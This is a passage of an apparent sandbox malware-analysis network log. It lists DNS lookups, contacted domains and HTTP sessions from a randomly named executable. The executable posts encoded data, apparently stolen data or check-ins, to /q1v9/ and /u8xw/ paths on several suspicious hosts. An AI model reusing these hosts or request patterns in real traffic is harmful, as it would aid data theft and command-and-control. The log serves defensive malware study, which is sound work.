                                                                            Jan 13, 2025 10:22:18.171596050 CET1.1.1.1192.168.2.40xc6fcNo error (0)www.rtp189z.latrtp189z.latCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:18.171596050 CET1.1.1.1192.168.2.40xc6fcNo error (0)rtp189z.lat68.65.122.71A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:32.252396107 CET1.1.1.1192.168.2.40x45f5Name error (3)www.glyttera.shopnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:40.314506054 CET1.1.1.1192.168.2.40xddb2Name error (3)www.usps-infora.topnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273134947 CET1.1.1.1192.168.2.40xdd30No error (0)www.u75lmwdgp0du.homestc142-site01.mac-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273134947 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.136.137A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273134947 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.137.130A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273134947 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.136.20A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273178101 CET1.1.1.1192.168.2.40xdd30No error (0)www.u75lmwdgp0du.homestc142-site01.mac-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273178101 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.136.137A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273178101 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.137.130A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:50.273178101 CET1.1.1.1192.168.2.40xdd30No error (0)tc142-site01.mac-cdn.net103.174.136.20A (IP address)IN (0x0001)false
                                                                            • www.zucchini.pro
                                                                            • www.ogbos88.cyou
                                                                            • www.esscosaathi.info
                                                                            • www.myfastuploader.sbs
                                                                            • www.grimbo.boats
                                                                            • www.sesanu.xyz
                                                                            • www.sovz.pro
                                                                            • www.tabyscooterrentals.xyz
                                                                            • www.sql.dance
                                                                            • www.811371bb10.buzz
                                                                            • www.rtp189z.lat
                                                                            • www.u75lmwdgp0du.homes
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449736199.59.243.228802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:19:31.328170061 CET466OUTGET /ajra/?idTDev6P=2p4airO795Dn7gjI0Dv91awJZZT6XeJxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt2IUp0UaNuBDF/7fv0VCCEc7XsfSWpnh1zI=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.zucchini.pro
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:19:31.792589903 CET1236INHTTP/1.1 200 OK
                                                                            date: Mon, 13 Jan 2025 09:19:31 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1466
                                                                            x-request-id: d3b13308-c6f2-42e8-b076-8ea0804584de
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_m3tMtGRJxw+J8uucK1dXlyffpEpRjQtHhgyqn1iIWQNJ4+doeWHYV3Q9hhGV7YOqAMu5QuA60iNy2ZP9DjzLAw==
                                                                            set-cookie: parking_session=d3b13308-c6f2-42e8-b076-8ea0804584de; expires=Mon, 13 Jan 2025 09:34:31 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 33 74 4d 74 47 52 4a 78 77 2b 4a 38 75 75 63 4b 31 64 58 6c 79 66 66 70 45 70 52 6a 51 74 48 68 67 79 71 6e 31 69 49 57 51 4e 4a 34 2b 64 6f 65 57 48 59 56 33 51 39 68 68 47 56 37 59 4f 71 41 4d 75 35 51 75 41 36 30 69 4e 79 32 5a 50 39 44 6a 7a 4c 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_m3tMtGRJxw+J8uucK1dXlyffpEpRjQtHhgyqn1iIWQNJ4+doeWHYV3Q9hhGV7YOqAMu5QuA60iNy2ZP9DjzLAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Jan 13, 2025 10:19:31.792609930 CET919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDNiMTMzMDgtYzZmMi00MmU4LWIwNzYtOGVhMDgwNDU4NGRlIiwicGFnZV90aW1lIjoxNzM2NzU5OT


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449779104.21.13.141802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:19:55.045418024 CET732OUTPOST /q1v9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.ogbos88.cyou
                                                                            Origin: http://www.ogbos88.cyou
                                                                            Referer: http://www.ogbos88.cyou/q1v9/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 77 54 38 73 65 49 7a 49 58 39 32 61 6d 6d 45 31 54 4d 43 79 4b 6d 31 6c 33 4c 46 6e 5a 68 33 62 59 4e 58 2f 6a 69 56 32 62 4b 6f 70 73 54 79 70 71 38 43 58 65 65 48 36 5a 6e 43 41 44 4c 35 44 48 75 58 77 71 77 4f 38 33 32 4c 70 79 67 59 4f 6f 49 32 6f 41 57 50 6a 4e 41 55 6f 63 50 55 61 6c 50 38 36 6a 58 69 79 6d 37 32 77 7a 30 72 74 75 6d 48 5a 65 47 47 6a 55 79 56 6c 6f 58 39 64 55 48 69 4c 7a 41 6b 5a 59 6b 56 33 32 55 52 41 43 41 77 72 72 4b 50 67 58 6a 79 78 6c 76 4a 58 65 2f 68 50 2b 66 77 4c 5a 44 78 6c 7a 2b 33 4b 73 7a 73 34 35 51 3d 3d
                                                                            Data Ascii: idTDev6P=rcFR0ScrqPh/wT8seIzIX92ammE1TMCyKm1l3LFnZh3bYNX/jiV2bKopsTypq8CXeeH6ZnCADL5DHuXwqwO832LpygYOoI2oAWPjNAUocPUalP86jXiym72wz0rtumHZeGGjUyVloX9dUHiLzAkZYkV32URACAwrrKPgXjyxlvJXe/hP+fwLZDxlz+3Kszs45Q==
                                                                            Jan 13, 2025 10:19:55.500876904 CET804INHTTP/1.1 301 Moved Permanently
                                                                            Date: Mon, 13 Jan 2025 09:19:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Mon, 13 Jan 2025 10:19:55 GMT
                                                                            Location: https://ogbos88vip.click
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vy3Km3feohEgmd3MWDrJIwwmdj1J9Eze0zCxuWA9dP3pB6r7IKcnHdkJr94e5K3ilXeBgjMForu6G3%2F%2F5cydVle%2BD6YM0f9uYQ9ciibL9Q3HZMy02knhqydhhzbgwLYfITWY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144eb38b94c43b-EWR
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449795104.21.13.141802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:19:57.595248938 CET752OUTPOST /q1v9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.ogbos88.cyou
                                                                            Origin: http://www.ogbos88.cyou
                                                                            Referer: http://www.ogbos88.cyou/q1v9/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 66 62 59 73 48 2f 6b 6a 56 32 59 4b 6f 70 6d 7a 79 77 6b 63 44 62 65 65 4b 51 5a 6e 2b 41 44 4c 74 44 48 76 6e 77 32 54 6d 2f 32 6d 4c 33 30 67 59 41 6c 6f 32 6f 41 57 50 6a 4e 41 41 52 63 50 63 61 6b 2f 4d 36 68 32 69 39 72 62 32 2f 6a 45 72 74 71 6d 47 51 65 47 48 32 55 77 68 50 6f 52 68 64 55 48 53 4c 79 55 77 59 42 55 56 35 70 6b 51 50 4c 6c 52 52 79 37 6d 4a 53 46 61 6b 6a 39 45 32 57 5a 73 56 76 75 52 63 4c 44 56 57 75 35 2b 2b 68 77 52 78 69 59 2b 65 48 46 77 47 32 46 42 4f 74 67 41 6f 58 51 32 76 5a 79 49 3d
                                                                            Data Ascii: idTDev6P=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3fbYsH/kjV2YKopmzywkcDbeeKQZn+ADLtDHvnw2Tm/2mL30gYAlo2oAWPjNAARcPcak/M6h2i9rb2/jErtqmGQeGH2UwhPoRhdUHSLyUwYBUV5pkQPLlRRy7mJSFakj9E2WZsVvuRcLDVWu5++hwRxiY+eHFwG2FBOtgAoXQ2vZyI=
                                                                            Jan 13, 2025 10:19:58.027172089 CET810INHTTP/1.1 301 Moved Permanently
                                                                            Date: Mon, 13 Jan 2025 09:19:57 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Mon, 13 Jan 2025 10:19:57 GMT
                                                                            Location: https://ogbos88vip.click
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMcw9GRKCfnya062kU0OR%2FyUb3mXUf0a%2F%2FMR1t5GQnGFy2aNPya05tL2uPUM%2Fo2D3XX8pmEfbCJp0OxUreLKShHE5YYhr%2FeBwgDsv5muKVPLiTcO7kFvXTann9r0D%2FhAPnPZ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144ec35d0a5e7a-EWR
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449812104.21.13.141802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:00.138780117 CET10834OUTPOST /q1v9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.ogbos88.cyou
                                                                            Origin: http://www.ogbos88.cyou
                                                                            Referer: http://www.ogbos88.cyou/q1v9/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 72 63 46 52 30 53 63 72 71 50 68 2f 79 33 34 73 62 72 72 49 44 74 32 5a 70 47 45 31 64 73 43 32 4b 6d 70 6c 33 4f 39 33 5a 33 6e 62 66 65 66 2f 69 41 4e 32 5a 4b 6f 70 71 54 79 74 6b 63 43 42 65 64 36 55 5a 6e 7a 31 44 49 56 44 47 4e 76 77 6d 6d 53 2f 2f 6d 4c 33 32 67 59 42 6f 49 32 39 41 53 6a 6e 4e 41 51 52 63 50 63 61 6b 38 55 36 76 33 69 39 70 62 32 77 7a 30 72 70 75 6d 47 38 65 46 32 4e 55 7a 4d 34 72 69 35 64 55 6e 43 4c 77 6e 59 59 4a 55 55 66 71 6b 52 51 4c 6c 56 30 79 37 36 6a 53 42 53 4f 6a 2f 59 32 56 74 64 55 77 65 74 59 49 53 42 52 79 35 72 66 34 54 34 39 6c 36 43 63 58 45 38 42 6c 6e 42 42 71 78 64 55 53 44 75 50 50 48 33 38 59 6f 69 7a 74 44 2f 64 66 6b 64 66 38 56 70 75 37 74 36 39 4f 38 58 55 34 74 77 68 78 30 50 4c 46 7a 76 70 72 43 49 72 75 78 52 6c 68 69 37 55 71 4d 41 53 6b 58 51 50 68 77 31 63 31 61 45 39 4e 75 57 69 30 63 55 71 51 43 38 43 54 77 61 52 47 68 2f 4f 51 72 52 55 76 2b 48 6a 79 6b 6f 6f 4e 39 43 32 6f 4e 4f 57 33 6f 62 6e 58 46 58 6f 61 [TRUNCATED]
                                                                            Data Ascii: idTDev6P=rcFR0ScrqPh/y34sbrrIDt2ZpGE1dsC2Kmpl3O93Z3nbfef/iAN2ZKopqTytkcCBed6UZnz1DIVDGNvwmmS//mL32gYBoI29ASjnNAQRcPcak8U6v3i9pb2wz0rpumG8eF2NUzM4ri5dUnCLwnYYJUUfqkRQLlV0y76jSBSOj/Y2VtdUwetYISBRy5rf4T49l6CcXE8BlnBBqxdUSDuPPH38YoiztD/dfkdf8Vpu7t69O8XU4twhx0PLFzvprCIruxRlhi7UqMASkXQPhw1c1aE9NuWi0cUqQC8CTwaRGh/OQrRUv+HjykooN9C2oNOW3obnXFXoaFpT87QGTKhhXjb3Xg0dCQfdbdTo7535PDVgTqEkT8n0hkSbuNZxpHuszvNCsIkcbxtUFhScY66k+m0l4PncLCy1HFjMbCQdUZKsiC9d2AlVurCkaxTYh4eJaRrEhpveoEhEdwBCftUElFcOx1EnaF5gaVduWDdtEP8FH686fGP5OCimPSUF2CqZaBRsRUYjmO5zBwNRgnYZVaQlBzvNlbcUfBCVLN+YFhr8+ibQgHy/aTJHhNJY4R+Mysf04QlMXjrwnQowT5gMa1jOSof3TQnb5dD19twqjPuY4u4iwt5tq2TLoNlFW/9vFif8MUboQ47fNSnP28j19b2AAwlYy1729z0wYFAne7aLLyr+PdB0w+KnTAPB0a8z4eS3Gaudpi0qF+56Vk3MqyeHlAVyZQmXheK2ezm96rB+XxabbxKStn4HqbwVWO/fi8AMNOfR3udWZQJiIldoVRG7au/nNRgTA5cXGrlivyz7jNAi6Y80WBEsuKZtN9oQgT7BMPVZuL3r4gNM9AOBr/MPl/emjSYDHL+VHqLXaDy+8MhtbZ1aEXdB5hbdPoElsRL9Ksg0NVh7t3wY86qiHmKumSBLwr2QISubOUu10FgXpRaFlv6OS+HNeJYbTmVAJTay+msT3J07suqfwnN91QgeoReZ5tpvr2RNt6hwpEP [TRUNCATED]
                                                                            Jan 13, 2025 10:20:00.595264912 CET806INHTTP/1.1 301 Moved Permanently
                                                                            Date: Mon, 13 Jan 2025 09:20:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Mon, 13 Jan 2025 10:20:00 GMT
                                                                            Location: https://ogbos88vip.click
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYvSQis7PK3g0trXsUyAf%2BaBGfTTHxhljQb3bkEnVQCk6Fp23%2FPe3HkGE16P%2F6qvBN7ENPMgXPeju2LEHIoymAH1MoPPIpNl%2Bmzhp6Ngy2iwH7uHwX4EDvFvNIDYxrrLXJCx"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Vary: Accept-Encoding
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144ed35db38c53-EWR
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449832104.21.13.141802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:02.680124044 CET466OUTGET /q1v9/?idTDev6P=metx3mUju98G7hAYbLi4XsmUgHwdedXXJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7T3N/CIVyK6RIDDiNH4cRPg0hdY8uXiShr8=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.ogbos88.cyou
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:20:03.318764925 CET783INHTTP/1.1 301 Moved Permanently
                                                                            Date: Mon, 13 Jan 2025 09:20:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: close
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Mon, 13 Jan 2025 10:20:03 GMT
                                                                            Location: https://ogbos88vip.click
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GUt1hKlveg10kaJkfBV5gsPVES%2BdUDzaamClptzyp9QMYq3TVo5ByPjCVz6GSF2j0UlWF8m7CtZ%2BaZuPS9n0GzFwSfIM9%2BdJw%2FN4B5nYGaxb637H8e8gLAdCOHAX0MvUyoM"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 90144ee32e645e7e-EWR
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.44986815.197.240.20802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:08.517261028 CET744OUTPOST /u8xw/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.esscosaathi.info
                                                                            Origin: http://www.esscosaathi.info
                                                                            Referer: http://www.esscosaathi.info/u8xw/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 76 2b 49 33 42 35 6e 6f 30 31 4b 30 6c 6d 64 5a 6c 32 72 74 44 5a 4a 4f 36 4c 48 52 32 66 37 58 52 56 41 37 74 46 59 65 5a 4f 70 41 34 70 44 78 35 54 55 58 59 64 53 44 6d 32 56 46 64 46 4a 54 71 4c 70 63 78 36 79 54 58 2b 4a 42 37 2b 47 56 76 2f 43 41 4e 50 72 47 68 46 55 6e 56 57 63 6b 6a 46 53 63 54 6a 75 73 6c 4b 4a 65 6b 64 65 34 4a 44 30 76 7a 30 4f 7a 4c 32 71 33 70 54 5a 67 75 70 69 58 63 67 46 4f 51 71 4d 6b 55 78 55 59 78 6c 4f 67 77 50 48 79 56 73 62 74 35 76 78 74 37 62 6d 69 50 41 42 75 66 39 79 50 71 48 34 67 48 59 6a 70 37 53 5a 61 48 4b 61 45 7a 4e 64 71 39 51 3d 3d
                                                                            Data Ascii: idTDev6P=v+I3B5no01K0lmdZl2rtDZJO6LHR2f7XRVA7tFYeZOpA4pDx5TUXYdSDm2VFdFJTqLpcx6yTX+JB7+GVv/CANPrGhFUnVWckjFScTjuslKJekde4JD0vz0OzL2q3pTZgupiXcgFOQqMkUxUYxlOgwPHyVsbt5vxt7bmiPABuf9yPqH4gHYjp7SZaHKaEzNdq9Q==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.44988415.197.240.20802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:20:11.059544086 CET764OUTPOST /u8xw/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.esscosaathi.info
                                                                            Origin: http://www.esscosaathi.info
                                                                            Referer: http://www.esscosaathi.info/u8xw/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
